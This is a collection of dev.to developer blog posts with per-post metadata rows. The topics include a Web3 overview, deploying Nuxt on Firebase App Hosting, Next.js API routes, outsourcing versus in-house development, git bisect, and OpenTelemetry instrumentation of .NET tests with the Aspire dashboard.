1,879,742 | Web3: The Future of the Internet | Introduction: Web3, also known as Web 3.0, is the envisioned future of the World Wide Web,... | 0 | 2024-06-07T00:17:26 | https://dev.to/sam15x6/web3-the-future-of-the-internet-1jfp | web3, webdev, blockchain, ai |
## Introduction:
Web3, also known as Web 3.0, is the envisioned future of the World Wide Web, promising to revolutionize the way we use the internet. It is a concept that builds upon the foundations of decentralized technologies, blockchain, and community-driven ideals to create a new, open, and user-controlled online experience. With Web3, the internet is anticipated to undergo a significant transformation, offering users greater control, ownership, and opportunities in the digital world.
## Understanding Web3:
Web3, or Web 3.0, represents the third generation of internet development and usage. The first generation, Web 1.0, was characterized by static web pages and limited user interaction. Web 2.0, the current iteration, is defined by dynamic content, user-generated material, and centralized platforms like social media and sharing economy giants.
Web3, as the next evolutionary step, aims to address the shortcomings of Web 2.0, particularly concerning data ownership, privacy, and the concentration of power in the hands of a few tech giants. Web3 envisions a decentralized web where users are not just consumers but also owners and stakeholders of the online platforms and communities they engage with.
## Key Characteristics of Web3:
- **Decentralization**: Web3 is built on the principle of decentralization, meaning there is no central authority or intermediary controlling the network. Instead, it relies on distributed ledger technologies like blockchain to facilitate peer-to-peer interactions and transactions. This decentralization ensures greater user privacy, security, and freedom from censorship.
- **User Ownership and Control**: In Web3, users own and control their data, content, and digital assets. They have the ability to decide how their information is shared, used, and monetized. This shift empowers individuals to have a financial stake in the web communities they participate in and to benefit directly from their contributions.
- **Blockchain Integration**: Blockchain technology is at the heart of Web3, enabling secure, transparent, and tamper-proof transactions. Blockchain also facilitates the use of cryptocurrencies and NFTs (non-fungible tokens), which are integral to the Web3 economy. Smart contracts, enabled by blockchain, allow for trustless and automated transactions, reducing the need for intermediaries.
- **Community and Collaboration**: Web3 emphasizes community-driven development and governance. Users actively participate in shaping the platforms and applications they use, often through decentralized autonomous organizations (DAOs). This collaborative approach empowers users to have a say in the direction of their online communities and the features they value.
- **Semantic Web**: Web3 incorporates the concept of the semantic web, where data is given well-defined meanings, enabling better understanding and interpretation by machines. This enhances search capabilities, knowledge generation, and problem-solving, making the web more intelligent and contextually aware.
- **Advanced App Interfaces**: Web3 will usher in more advanced and multidimensional app interfaces. For example, a mapping service could not only provide location search but also offer route planning, lodging suggestions, and real-time traffic updates, all within a single platform.
## Benefits of Web3:
- **Enhanced Privacy and Security**: By removing central points of failure and control, Web3 reduces the risk of data breaches and enhances user privacy. Blockchain technology further secures user information and transactions.
- **Greater User Control**: Web3 gives users the power to control their digital lives, including their data, content, and online identities. This control extends to monetization opportunities, allowing users to directly benefit from their online activities.
- **Incentivized Participation**: Web3 encourages active participation and contribution to online communities. Users can be incentivized through various mechanisms, such as token rewards, governance rights, or direct financial gains, fostering a more engaged and invested user base.
- **Open and Accessible**: Web3 technologies are designed to be open and accessible to all, lowering barriers to entry and promoting inclusivity. This democratization of the web has the potential to unlock innovation and creativity on a global scale.
## Challenges and Criticisms:
While Web3 offers a promising vision for the future of the internet, it also faces several challenges and criticisms.
- **Adoption and Usability**: One of the key challenges for Web3 is widespread adoption and making these technologies user-friendly. Blockchain and cryptocurrency, for instance, are still considered complex and intimidating by many, requiring a shift in user understanding and behavior.
- **Regulatory and Legal Issues**: The decentralized nature of Web3 presents regulatory challenges, particularly concerning governance, taxation, and legal jurisdictions. Establishing clear frameworks for these new online communities and economic models will be essential.
- **Centralization Concerns**: Despite the decentralized ideals of Web3, there are concerns about the potential for centralization within certain platforms or blockchain networks. This could lead to the creation of new gatekeepers and power structures, undermining the very principles Web3 aims to uphold.
- **Environmental Impact**: The energy consumption and environmental impact of blockchain technology, particularly proof-of-work consensus mechanisms, have been criticized. As Web3 gains traction, addressing these concerns through more sustainable practices will be crucial.
## Conclusion:
Web3 represents a significant shift in the way we conceive of and interact with the internet, offering a decentralized, user-owned, and community-driven vision for the future. While challenges and uncertainties remain, the potential benefits of Web3 are vast, promising a more open, secure, and equitable online experience. As we move forward, it is essential to carefully consider the implications of this new web paradigm and work towards realizing its positive potential while mitigating the risks and challenges along the way. | sam15x6 |
1,863,442 | Yes. You can deploy Nuxt on Firebase App Hosting (2024) | Firebase team just announced, at Google I/O 2024, a new product to deploy fullstack web app: Firebase... | 0 | 2024-06-07T00:12:46 | https://dev.to/rootasjey/yes-you-can-deploy-nuxt-on-firebase-app-hosting-2024-44bd | tutorial, nuxt, firebase, webdev | Firebase team just announced, at [Google I/O 2024](https://youtu.be/qyhdKb8liEA), a new product to deploy fullstack web app: [Firebase App Hosting](https://firebase.google.com/docs/app-hosting?authuser=1).
Previously we had [Firebase Hosting](https://firebase.google.com/docs/hosting) which was only suitable for frontend apps:
* Types : Static Site, SPA Single Page App
* Frameworks : Vue.js, React.js, Svelte, Flutter web.
But we couldn't deploy fullstack apps (using SSR or ISR) with Firebase Hosting. It was possible to work around this limitation using Firebase Functions; I tried it, and it was neither easy nor pleasant:
* There was latency due to function cold starts
* You have to configure the functions to serve the content (which is an additional step specific to Firebase Hosting)
Today, with Firebase App Hosting, this has become a lot easier.
Since the Firebase team didn't explicitly say whether it was possible to deploy applications other than Angular and Next.js, I took the journey of deploying a Nuxt app using SSR.
<br />
**TL;DR: It's working!**
<br />
I'll assume that you have the necessary toolings to develop a Nuxt app. You need:
- [Node.js](https://nodejs.org/) installed - v18.0.0 or newer
- [A terminal](https://warp.dev/): in order to run Nuxt & Firebase commands
- A Text editor: like [VSCode](https://code.visualstudio.com/)
- [Git](https://git-scm.com/) and a [GitHub](https://github.com/) account
(create an account if you don't already have one)
I'm using macOS with Node.js v20.13.1 (lts/iron), VSCode with the [official Vue extension](https://marketplace.visualstudio.com/items?itemName=Vue.volar), [bun](https://bun.sh/) v1.1.8.
I'll name the project nuxt-firebase. Feel free to replace that name with your own.
<br />
<br />
## Create a Nuxt app
Let's create a Nuxt app with minimal code and an SSR configuration. Then we will deploy it to the cloud.
<br />
<br />
### Initialize the repository
[(You can follow the official Nuxt documentation there).](https://nuxt.com/docs/getting-started/installation)
{% embed https://www.loom.com/share/ebfe93c5dcf04aa1897ddd3c80998153?sid=43a2aa94-1106-40aa-b9cd-4fe45bd6e9da %}
<br />
First, initialize a repository with Nuxt:
```bash
# initialize your nuxt app
npx nuxi@latest init nuxt-firebase
```
We then navigate into the created directory:
```bash
# move into your project directory
cd nuxt-firebase
```
Run the app to check that everything is okay:
```bash
# in your nuxt project directory
npm run dev -- -o
```
<br />
### Add pages and routes
We're going to edit the app.vue file and add two pages inside the /pages/ directory which does not exist yet.
{% embed https://www.loom.com/share/22d2476442ec4834a58ac5d0b316b5fb?sid=f2fdc398-54f1-4e6d-84fc-02c156da36f2 %}
Replace the content of app.vue with this one:
```vue
// app.vue
<template>
<NuxtLayout>
<NuxtPage />
</NuxtLayout>
<footer>
<div class="link-bar">
<NuxtLink to="/">Home</NuxtLink>
<NuxtLink to="/about">About</NuxtLink>
</div>
</footer>
</template>
<style>
footer {
position: fixed;
bottom: 24px;
display: flex;
justify-content: center;
align-items: center;
left: 0;
right: 0;
padding: 10px;
text-align: center;
}
.link-bar {
display: flex;
justify-content: center;
gap: 1rem;
padding: 0.5rem;
border-radius: 0.5rem;
border: 1px solid #FFE6E6;
box-shadow: 0 0 10px #FFE6E6;
position: relative
}
</style>
```
Create the `/pages/` folder at the root of your project's directory. Inside, add these two files:
**index.vue:**
```vue
// pages/index.vue
<template>
<h1>Index</h1>
</template>
```
**about.vue:**
```vue
// pages/about.vue
<template>
<h1>About</h1>
</template>
```
You should see something like this in your browser:

It's very basic. You can customize your pages but for our demo it's good enough.
<br />
### Configure Rendering Modes
By default, Nuxt uses SSR in development mode, but switches to client-side rendering in production (for example, static rendering).
We need to configure our app routes to explicitly tell Nuxt to use SSR for our pages in `nuxt.config.ts`:
```ts
// nuxt.config.ts
// --------------
// https://nuxt.com/docs/api/configuration/nuxt-config
export default defineNuxtConfig({
devtools: { enabled: true },
routeRules: {
'/': { ssr: true },
'/about': { ssr: true },
},
})
```
Now, when we deploy our app on Firebase App Hosting, the routes `/` and `/about` will be served through server-side rendering (SSR).
For our own knowledge, here is an example of a config rendering rules with their purpose:
```ts
// nuxt.config.ts
export default defineNuxtConfig({
routeRules: {
// Homepage pre-rendered at build time
'/': { prerender: true },
// Products page generated on demand, revalidates in background, cached until API response changes
'/products': { swr: true },
// Product page generated on demand, revalidates in background, cached for 1 hour (3600 seconds)
'/products/**': { swr: 3600 },
// Blog posts page generated on demand, revalidates in background, cached on CDN for 1 hour (3600 seconds)
'/blog': { isr: 3600 },
// Blog post page generated on demand once until next deployment, cached on CDN
'/blog/**': { isr: true },
// Admin dashboard renders only on client-side
'/admin/**': { ssr: false },
// Add cors headers on API routes
'/api/**': { cors: true },
// Redirects legacy urls
'/old-page': { redirect: '/new-page' }
}
})
```
An overview of routes rendering rules:

Source: https://nuxt.com/docs/guide/concepts/rendering#route-rules
See the official documentation for more information: https://nuxt.com/docs/guide/concepts/rendering
<br />
## Push into GitHub
The final part in the code editor is to push the new code to [GitHub](https://github.com/). Thus Firebase will be able to fetch and build our app with its CI/CD.
{% embed https://www.loom.com/share/701d8dac81444ac7b203bf0a24d9f08e?sid=99495d57-4973-44e1-9a24-e13b57a610fa %}
You can see the source code here: [nuxt-firebase](https://github.com/rootasjey/nuxt-firebase)
<br />
## Deploy on Firebase App Hosting
First we need to [create a Firebase account](https://firebase.google.com/) if we don't have one. After your Firebase account has been created, you should see the welcome screen. Click on the "Create a project" button:
{% embed https://www.loom.com/share/3e6540357efa4e97ae0fb02ce2fa7c7c?sid=73011a55-422d-4021-bf25-e371a5872bc7 %}
Once the project is created, go to the left sidebar and select "App Hosting".
You can follow the video tutorial or/and the screen by screen images with text explanations:
{% embed https://www.loom.com/share/c5a2f777651a44c786ff0b9f23e2a22b?sid=cd269e94-e8f3-4c23-8adb-ea843a41ec12 %}
App Hosting button is in the Build accordion:

We arrive on the App Hosting welcome page:

We need to upgrade our project from Spark Plan to Blaze Plan.
Our Nuxt app uses features in the Blaze plan, so we have to add a payment method. For this demo we'll pay little to nothing, since our app won't consume many resources if it has minimal traffic. Firebase products pricing – including App Hosting – is usage-based, meaning that if your app gets approximately 10k visits, you'll pay ~$0.15 according to the [Firebase documentation](https://firebase.google.com/docs/app-hosting/costs).

NOTE: This is an example and other factors should be taken into account like: Effective Concurrency, CPU/Mem Time.
Plus there are no-cost limits which allow us to use these resources for free before being charged:

After clicking on the "Upgrade project" button, a popup opens:

Click on "Continue".

We confirm our country, and enter a payment method.
Your account is now set up on the Blaze plan, so we can go to our dashboard and create a new **App Hosting** project (which will live inside our Firebase project: nuxt-firebase).
Click on the "Get started" button.

The configuration wizard will ask us to grant access from our GitHub account to Google Developer Connect, which will then be linked to Firebase.

When this is done, we will be able to select our GitHub account and Nuxt app (hosted on GitHub).
Wait a few minutes for the app to build. At the time of writing, the build is much slower than on Vercel: ~45 seconds on Vercel versus ~3 minutes on Firebase App Hosting.
And voilà! If the build and deployment succeeded, a new link is generated with an SSL certificate. It may take some time (minutes or hours) for the link to become functional.

You can visit the deployed [Nuxt app at this new URL](https://nuxt-firebase--nuxt-firebase-1f646.us-central1.hosted.app/).
The source code is on [GitHub](https://github.com/rootasjey/nuxt-firebase).
## Sources
* [Nuxt documentation](https://nuxt.com/docs/getting-started/installation)
* [Google I/O - Introducing Firebase App Hosting](https://youtu.be/qyhdKb8liEA?si=Fm0BohXjKZA7O93w)
* [Firebase App Hosting documentation](https://firebase.google.com/docs/app-hosting) | rootasjey |
1,878,706 | Simplest guide to Next.js APIs | What Makes Next.js APIs So Special? I'm assuming you know what APIs are. APIs are an... | 0 | 2024-06-07T00:12:41 | https://dev.to/joeskills/simplest-guide-to-nextjs-apis-204g | api, nextjs, webdev, simple | ## What Makes Next.js APIs So Special?
I'm assuming you know what APIs are. APIs are an important part of developing functional web apps, and Next.js has supported building them since API routes arrived in version 9.0 back in 2019. There are lots of other ways to build a separate backend (like Ruby, PHP, Express.js, Django, etc.), _**so why even do it in Next.js?**_
## It might not be that great
By default, Next.js route handlers are deployed as serverless functions, which means in some cases you might face **cold starts**, **high scaling costs**, and **vendor lock-in**, since they require serverless platforms like Vercel to work properly. They also have **limitations when it comes to complex middleware,** unlike a library like Express.js, which was designed for routing on a server.
## But it's not that bad
But most of these issues are automatically taken care of by Vercel (which provides amazing **caching & optimization** strategies) and **serverless functions can be scalable and cost-effective** if done properly. Here are some more benefits of using Next.js as both your frontend and backend:
- **Hot reloading:** This means when developing, you get the same hot reload features as your frontend for your API routes, which makes development faster.
- **Consistency of your codebase:** It greatly simplifies development by keeping the frontend and backend logic in the same place.
- **File-based routing**: API routes use a simple file-based routing system that easily integrates into your Next.js project structure.
- **No additional setup:** There's no need to configure additional middleware or create a separate server.
- **Simplification:** It has built-in features to simplify common tasks when developing your API.
## API routes in the Next.js app router
The app router uses a **file-based routing system** that starts from the `app` directory. You can **mirror URL paths by defining API routes in a nested folder structure**. By doing this, you create _Node.js serverless functions that act as API endpoints_.
```
app/
└── api/
└── hello/
└── route.js
```
## Creating API routes
The API route file must be named `route.js` or `route.ts` (for TypeScript users) and live under an `api` folder inside the `app` folder. In these files you define **functions that handle different HTTP methods** (such as GET, POST, PUT, PATCH, etc.). For example, a `GET` request to `/api/hello` would be handled by a `GET` function in `app/api/hello/route.js`.
### Request methods and API route functions
The standard convention is that within the `route.js` or `route.ts` file, you name an exported function with the **HTTP method you want it to handle in your API endpoint in uppercase**. The functions usually look like this:
```
// app/api/users/route.js
import { NextResponse } from 'next/server';
export async function GET(request) {
// Simulate a database call to fetch users
const users = [
{ id: 1, name: 'John Doe' },
{ id: 2, name: 'Jane Doe' },
];
// Return the users as a JSON response
return NextResponse.json(users);
}
```
### NextResponse and Request
The `NextResponse` is a **helper class** that extends the [web Response API](https://developer.mozilla.org/en-US/docs/Web/API/Response) with **additional convenience methods**, which are used to create responses. You can use it to rewrite, redirect, set headers, or create and send JSON responses.
---
The `Request`: When you define functions by using HTTP methods in creating your API endpoints, **the functions receive a `Request` object as an argument** which contains information about the incoming request. The object uses the [web Request API](https://developer.mozilla.org/en-US/docs/Web/API/Request). You can use it to read the request query parameters, **read the request body**, or access the request headers.
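To make both objects concrete, here is a minimal sketch of a handler that reads a query parameter from the incoming request and returns JSON. The `/api/greet` path and `name` parameter are invented for this example, and the standard web `Response` is used so the snippet also runs outside Next.js; in a real route file you would return `NextResponse.json(...)` from `next/server` instead:

```javascript
// Sketch of app/api/greet/route.js (the path and parameter are illustrative).
// In a real Next.js route file this would be `export async function GET(request)`.
async function GET(request) {
  // The handler receives a web-standard Request, so its URL and
  // query string can be read with the URL class.
  const { searchParams } = new URL(request.url);
  const name = searchParams.get('name') ?? 'world';

  // NextResponse.json(...) is the Next.js shorthand for building this response:
  return new Response(JSON.stringify({ greeting: `Hello, ${name}!` }), {
    headers: { 'content-type': 'application/json', 'x-example': 'demo' },
  });
}

// Simulate the request Next.js would pass to the handler:
GET(new Request('http://localhost/api/greet?name=Ada'))
  .then((res) => res.json())
  .then((body) => console.log(body.greeting)); // Hello, Ada!
```

The same pattern works for reading headers (`request.headers.get(...)`) or the body (`await request.json()`).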
## Dynamic routes
By using **square brackets** when naming a folder above the `route.ts` or `route.js` file, you can create a dynamic route for your API.
```
app/
└── api/
└── users/
└── [userId]/
└── route.ts
```
### Accessing a dynamic route
The dynamic route parameters can be accessed from the **route handler function's second argument**, which has the `params` object.
Take a look at this example:
```
// app/api/users/[userId]/route.ts
import { NextResponse } from 'next/server';
export async function GET(request: Request, { params }: { params: { userId: string }}) {
const {userId} = params
// Simulate a database call to fetch users
const users = [
{ id: 1, name: 'John Doe' },
{ id: 2, name: 'Jane Doe' },
];
// Filter users by id (loose == because userId arrives as a string)
const user = users.filter((user) => user.id == userId)
// Return the matching user as a JSON response
return NextResponse.json(user);
}
```
I hope that wasn't complicated, and you got something out of this.
You can hear more from me on:
[Twitter (X)](https://x.com/code_withjoseph) | [Instagram](https://www.instagram.com/codewithjosephwebdev) | joeskills |
1,879,740 | Software Outsourcing vs. In-House Development: Pros and Cons | The world is modernizing day by day and it is rapidly changing according to the world of technology.... | 0 | 2024-06-07T00:09:20 | https://dev.to/liong/software-outsourcing-vs-in-house-development-pros-and-cons-2261 | development, outsourcing, malaysia, kualalumpur | The world is modernizing day by day and it is rapidly changing according to the world of technology. Most of the time nowadays, businesses are facing a very difficult question of whether they need to get started with software outsourcing or to in-house their work to outside external vendors. This is a point of getting the idea of both different kinds of software [in-house vs outsourcing development](https://ithubtechnologies.com/top-developer-in-malaysia/?utm_source=dev.to&utm_campaign=inhousevsoutsourcedevelopment&utm_id=Offpageseo+2024) as each of the software development has its own set of advantages and disadvantages.
This shows us how both of these are impacting in positive and negative aspects as it can impact our success of a business project. Here in this blog, you are going to get a basic idea about the pros and cons of software development. It is very important to know if you want to make a correct final decision that matches the company's aims and goals.
## In-House Development
## Pros:
1. **Full Control Over the Development Process:**
In-house development gives you full control over the entire development cycle, from initial planning through design and coding, with an on-site team that makes sure the project matches the company's vision.
2. **Smooth Communication and Collaboration:**
Physical closeness makes communication and collaboration much easier, which leads to quicker decision-making and problem-solving and helps keep the whole team on the same page.
3. **Understanding of Company Requirements:**
An in-house team tends to develop a much deeper understanding of the company's needs, preferences, culture, and business processes, which helps it build a product that truly matches the company's requirements.
4. **Easier to Apply Changes:**
With in-house development, it is much easier to apply changes and make adjustments quickly. The team can rapidly adapt to new requirements or feedback, ensuring the software evolves together with the business.
5. **Security of Intellectual Property:**
Keeping everything in-house reduces the risk of intellectual property (IP) leakage; the company retains full ownership and control of proprietary information.
## Cons:
1. **High Costs:**
The biggest problem with in-house development is its high cost. Hiring, training, and retaining expert developers can be quite expensive, and there are additional costs such as office space, equipment, and employee benefits.
2. **Limited Skill Set:**
An in-house team's skill set is often limited compared to that of specialized outsourcing firms. This can be a risk when handling a project that needs niche expertise or a wide variety of technical skills.
3. **Resource Limitations:**
Resource limitations arise when the company runs many projects at the same time. This can cause delays, overworked staff, and lower-quality project output.
4. **Longer Time to Market:**
Building and managing an in-house team is time-consuming: recruitment, team management, and development all take a lot of time, which can delay the start of a project and extend the time to market.
## Software Outsourcing
## Pros:
1. **Cost Efficiency:**
Software outsourcing can be very cost-effective when working with vendors in countries with lower labor costs. Companies can save on salaries, benefits, and infrastructure expenses.
2. **Access to a Global Talent Pool:**
Outsourcing gives you access to a global talent pool of skills and expertise, allowing companies to tap specialized knowledge and modern technology that may not be available in-house.
3. **Flexibility:**
Outsourcing provides greater flexibility: companies can easily scale teams up or down according to project requirements without a long-term commitment to full-time staff.
4. **Faster Time to Market:**
Established processes and experienced teams let outsourced projects reach the market faster, giving companies a competitive edge.
5. **Focus on Core Business Activities:**
Outsourcing software development lets you focus on core business activities, allowing the internal team to concentrate on business growth rather than technical development.
## Cons:
1. **Communication Issues:**
A major drawback of outsourcing is communication. Working with an external team, often across different time zones and languages, can lead to misunderstandings and project delays.
2. **Less Control:**
With outsourcing, you have less control over the development process, which can make it harder to manage projects smoothly and ensure vendors stick to your vision.
3. **Quality Issues:**
Not all outsourcing firms deliver the same level of quality, so there is a risk of poor work that ends up costing additional money and time.
4. **Security Concerns:**
Sharing sensitive information with external vendors can pose security and privacy risks.
5. **Cultural Differences:**
Outsourced vendors may come from different countries, cultures, languages, and time zones, which can make collaboration harder and affect working relationships and product quality.
## Conclusion:
As the points above show, both development models have advantages and disadvantages. The key is to weigh those pros and cons against your company's goals and then make the final decision.
| liong |
1,880,498 | Modules Status Update | Happy Friday Hope everyone had an awesome week stay tuned for latest updates and enjoy... | 0 | 2024-06-14T17:36:13 | https://puppetlabs.github.io/content-and-tooling-team/blog/updates/2024-06-07-modules-status-update/ | puppet, community | ---
title: Modules Status Update
published: true
date: 2024-06-07 00:00:00 UTC
tags: puppet,community
canonical_url: https://puppetlabs.github.io/content-and-tooling-team/blog/updates/2024-06-07-modules-status-update/
---
## Happy Friday
Hope everyone had an awesome week. Stay tuned for the latest updates and enjoy your weekend…
| puppetdevx |
1,880,287 | Stop Wasting Hours! Git Bisect: Your Ultimate Bug Hunting Tool | Ever spent hours sifting through lines of code, desperately trying to pinpoint the source of a pesky... | 26,070 | 2024-06-07T11:23:51 | https://ionixjunior.dev/en/stop-wasting-hours-git-bisect-your-ultimate-bug-hunting-tool/ | git | ---
title: Stop Wasting Hours! Git Bisect: Your Ultimate Bug Hunting Tool
published: true
date: 2024-06-07 00:00:00 UTC
tags: git
canonical_url: https://ionixjunior.dev/en/stop-wasting-hours-git-bisect-your-ultimate-bug-hunting-tool/
cover_image: https://ionixjuniordevthumbnail.azurewebsites.net/api/Generate?title=Stop+Wasting+Hours%21+Git+Bisect%3A+Your+Ultimate+Bug+Hunting+Tool
series: mastering-git
---
Ever spent hours sifting through lines of code, desperately trying to pinpoint the source of a pesky bug? You're not alone. Debugging can feel like a frustrating maze, especially when you're dealing with complex projects and a history of numerous commits. But what if I told you there's a powerful tool that can help you track down the culprit commit in minutes, not hours? Enter Git Bisect, the secret weapon for efficient debugging. Let's learn about it now!
Imagine you’re working on a project with hundreds of commits, and suddenly, your code breaks. Instead of manually inspecting each commit, Git Bisect uses a clever binary search algorithm to quickly identify the exact commit that introduced the bug. This means you can say goodbye to endless hours of frustration and hello to faster debugging and quicker fixes. But how can it be possible?
Git Bisect is like a detective's magnifying glass for your code. It helps you pinpoint the exact commit that introduced a bug, making debugging a breeze. Think of it as a binary search applied to your Git history. Not familiar with binary search? You can find plenty of tutorials on the internet, but I'll try to explain it here.
## How Binary Search Works
Imagine you have a sorted list of numbers, and you want to find a specific number within that list. Binary search works like this:
1. Start in the middle: Find the middle number in the list.
2. Compare: Is the number you’re looking for greater than or less than the middle number?
3. Cut in half: If your number is greater, discard the lower half of the list. If it’s less, discard the upper half.
4. Repeat: Now, you have a smaller list. Find the middle number in this new list and repeat steps 2 and 3.
5. Keep halving the list: You’ll keep cutting the list in half until you find the number you’re looking for.
### Requirements for Binary Search
- Sorted List: The list must be sorted (ascending or descending order) for binary search to work.
- Unique Elements: Ideally, the list should have unique elements, meaning no duplicates. This makes the search more efficient.
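As a quick illustration, the steps above translate almost line-for-line into code. Here is a minimal JavaScript sketch (the sample array and targets are made up for the example):

```javascript
// Binary search over a sorted array of numbers.
// Returns the index of `target`, or -1 if it is not present.
function binarySearch(sorted, target) {
  let low = 0;
  let high = sorted.length - 1;
  while (low <= high) {
    const mid = Math.floor((low + high) / 2); // start in the middle
    if (sorted[mid] === target) return mid;   // found it
    if (sorted[mid] < target) low = mid + 1;  // discard the lower half
    else high = mid - 1;                      // discard the upper half
  }
  return -1; // the target is not in the list
}

console.log(binarySearch([2, 5, 8, 12, 16, 23, 38], 23)); // 5
console.log(binarySearch([2, 5, 8, 12, 16, 23, 38], 7));  // -1
```

Each iteration halves the remaining range, so even a list of a million elements needs only about 20 comparisons.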
Now that we know how binary search works, let's delve into Git Bisect.
## How Git Bisect Works
Imagine our Git repository as a timeline, with each commit marking a step in our project’s history. Think of this timeline as our sorted list, with each commit like an entry, ordered chronologically. When we need to find the specific commit that introduced a bug into our code, we can use the same efficient logic of binary search to discover it.
To use Git Bisect, we need to guide it by identifying 'good' and 'bad' commits. Think of it like playing a game of 'hot or cold'. We tell Git which commit is 'good' (where the code works) and which is 'bad' (where the bug exists). This mirrors binary search, where you say whether your number is greater or less than the middle one. Based on this information, Git Bisect can efficiently narrow down the search space, like discarding the lower or upper half of a list of commits, until it pinpoints the exact culprit commit.
And, believe me: it works like a charm! I really like this command!
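To see why it works so well, here is a toy JavaScript simulation of the narrowing process. The numbers are made up: commits are modeled as array indices ordered oldest to newest, and `isBad` stands in for you testing a commit and answering "good" or "bad":

```javascript
// Toy simulation of how `git bisect` narrows down a commit range.
// Every commit at or after the first bad commit exhibits the bug.
// Returns the first bad commit's index and how many tests it took.
function bisect(commitCount, isBad) {
  let good = -1;              // newest commit known to be good
  let bad = commitCount - 1;  // oldest commit known to be bad
  let steps = 0;
  while (bad - good > 1) {
    const mid = Math.floor((good + bad) / 2); // commit git asks you to test
    if (isBad(mid)) bad = mid;                // `git bisect bad`
    else good = mid;                          // `git bisect good`
    steps++;
  }
  return { firstBad: bad, steps };
}

// 1024 commits, bug introduced at commit 700:
const { firstBad, steps } = bisect(1024, (i) => i >= 700);
console.log(firstBad, steps); // 700 10
```

Finding the culprit among 1024 commits takes only about 10 tests instead of hundreds, which is exactly the speedup Git Bisect gives you.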
## Using Git Bisect in Practice
Now that we understand the concept of Git Bisect, let’s put it into action. Here’s a step-by-step guide to help you use Git Bisect in your own projects. Do you have a bug in your project? Try it!
### 1. Identify the “Good” Commit
Start by finding a commit that you know is working correctly (without the bug). This could be the last known working version, a specific release tag, or even a commit before you introduced the problematic feature. Remember, this commit should be before the point where the bug was introduced.
### 2. Identify the “Bad” Commit
Now, pinpoint the commit where the bug is present. This could be your latest commit, or any commit where you observe the bug. This commit should be after the point where the bug was introduced.
### 3. Initiate Git Bisect
Open your terminal and navigate to your Git repository. Run the following command:
```
git bisect start
```
### 4. Tell Git Bisect About “Good” and “Bad” Commits
Run these commands to mark your “good” and “bad” commits:
```
git bisect good commit-hash-of-good-commit
git bisect bad commit-hash-of-bad-commit
```
Replace `commit-hash-of-good-commit` and `commit-hash-of-bad-commit` with the actual commit hashes you identified in steps 1 and 2.
### 5. Git Bisect’s Suggestions
Git Bisect will now choose a commit somewhere between your “good” and “bad” commits. It will ask you to test this commit and tell it if the bug is present or not. Run your tests or manually check if the bug exists.
### 6. Provide Feedback
If the bug is present in the suggested commit, run:
```
git bisect bad
```
If the bug is not present in the suggested commit, run:
```
git bisect good
```
Git Bisect will then choose another commit based on your feedback and repeat the process.
### 7. Finding the Culprit
Git Bisect will continue this process of narrowing down the search space until it finds the commit that introduced the bug. It will display a message like "&lt;commit-hash&gt; is the first bad commit" to indicate the culprit commit.
### 8. Leaving Git Bisect
You can use `git bisect reset` to return to your original branch and review the code for the problematic commit.
### 9. Fixing the Bug
You can now fix the bug by analyzing the culprit commit and testing your changes. I really like this approach, because you don't need to look through a lot of code and changes: Git Bisect gives you the specific commit that introduced the bug. This is smarter because the chances of fixing the root of the problem increase.
Another interesting option is to automate the test run. You can create a script and let Git Bisect run it on every commit it checks out, so you don't need to test each step manually. This is a way to use Git Bisect "like a pro", but I won't cover it in this post. If you want to know about it, tell me in the comments.
## Embrace Git Bisect for Faster Debugging
In this post, we’ve explored the power of Git Bisect, a powerful tool for tracking down pesky bugs in your codebase. We learned that Git Bisect utilizes a binary search algorithm to efficiently narrow down the search space of commits, quickly identifying the one that introduced the bug.
By understanding how Git Bisect works, you can significantly streamline your debugging workflow. Git Bisect not only saves you time and frustration but also helps you develop a deeper understanding of your codebase and its evolution. Also, I believe it’s a safer way to fix things, because you’re focused on the root of the problem, not on side effects.
So, the next time you encounter a stubborn bug, don’t hesitate to reach for Git Bisect. Embrace the power of this efficient tool to quickly identify the problem and get back to building amazing software. Try using Git Bisect in your next debugging session. Share your experiences and insights in the comments below. Let’s make debugging a more efficient and enjoyable process for all developers!
Remember, mastering Git Bisect is an investment that will pay off for years to come. So, go forth and debug with confidence!
Happy coding! | ionixjunior |
1,880,745 | Automated Tests instrumentation via OpenTelemetry and Aspire Dashboard | TL;DR In this post, we’ll look at how you can use OpenTelemetry to monitor your automated... | 0 | 2024-06-10T07:51:47 | https://nikiforovall.github.io/dotnet/opentelemtry/2024/06/07/test-instrumentation-with-otel-aspire.html | dotnet, aspnetcore, aspire, tests | ---
title: Automated Tests instrumentation via OpenTelemetry and Aspire Dashboard
published: true
date: 2024-06-07 00:00:00 UTC
tags: dotnet,aspnetcore,aspire,tests
canonical_url: https://nikiforovall.github.io/dotnet/opentelemtry/2024/06/07/test-instrumentation-with-otel-aspire.html
cover_image: https://nikiforovall.github.io/assets/test-instrumentation/blog-cover.png
---
## TL;DR
In this post, we’ll look at how you can use [OpenTelemetry](https://opentelemetry.io/docs/languages/net/instrumentation/) to monitor your automated tests and send that data to the Aspire Dashboard for visualization. The benefit of this approach is that you gain better insights into how your code works.
**Source code** : [https://github.com/NikiforovAll/tests-instrumentation-with-otel-and-aspire](https://github.com/NikiforovAll/tests-instrumentation-with-otel-and-aspire)
<center>
<img src="https://nikiforovall.github.io/assets/test-instrumentation/blog-cover.png" style="margin: 15px;">
</center>
- [TL;DR](#tldr)
- [Introduction](#introduction)
- [Running Integration Tests](#running-integration-tests)
- [Code Explained](#code-explained)
- [Instrumenting Tests](#instrumenting-tests)
- [Conclusion](#conclusion)
- [References](#references)
## Introduction
In this post, we’ll look at how you can use [OpenTelemetry](https://opentelemetry.io/docs/languages/net/instrumentation/) to monitor your automated tests and send that data to the Aspire Dashboard for visualization. The benefit of this approach is that you gain better insights into how your code works.
We are going to write integration tests for a TodoApi application that can be defined as follows:
```csharp
var builder = WebApplication.CreateBuilder(args);
builder.AddServiceDefaults();
builder.Services.AddHostedService<DbInitializer>();
builder.AddNpgsqlDbContext<TodoDbContext>("db");
builder.Services.AddEndpointsApiExplorer();
builder.Services.AddSwaggerGen();
var app = builder.Build();
if (app.Environment.IsDevelopment())
{
app.UseSwagger();
app.UseSwaggerUI();
}
app.MapDefaultEndpoints();
app.MapTodos();
await app.RunAsync();
```
Here is the API surface:
```csharp
public static RouteGroupBuilder MapTodos(this IEndpointRouteBuilder routes)
{
var group = routes.MapGroup("/todos");
group.WithTags("Todos");
group.WithParameterValidation(typeof(TodoItemViewModel));
group
.MapGet("/", GetTodoItems)
.WithOpenApi();
group
.MapGet("/{id}", GetTodoItem)
.WithOpenApi();
group
.MapPost("/", CreateTodoItem)
.WithOpenApi();
group
.MapPut("/{id}", UpdateTodoItem)
.WithOpenApi();
group
.MapDelete("/{id}", DeleteTodoItem)
.WithOpenApi();
return group;
}
```
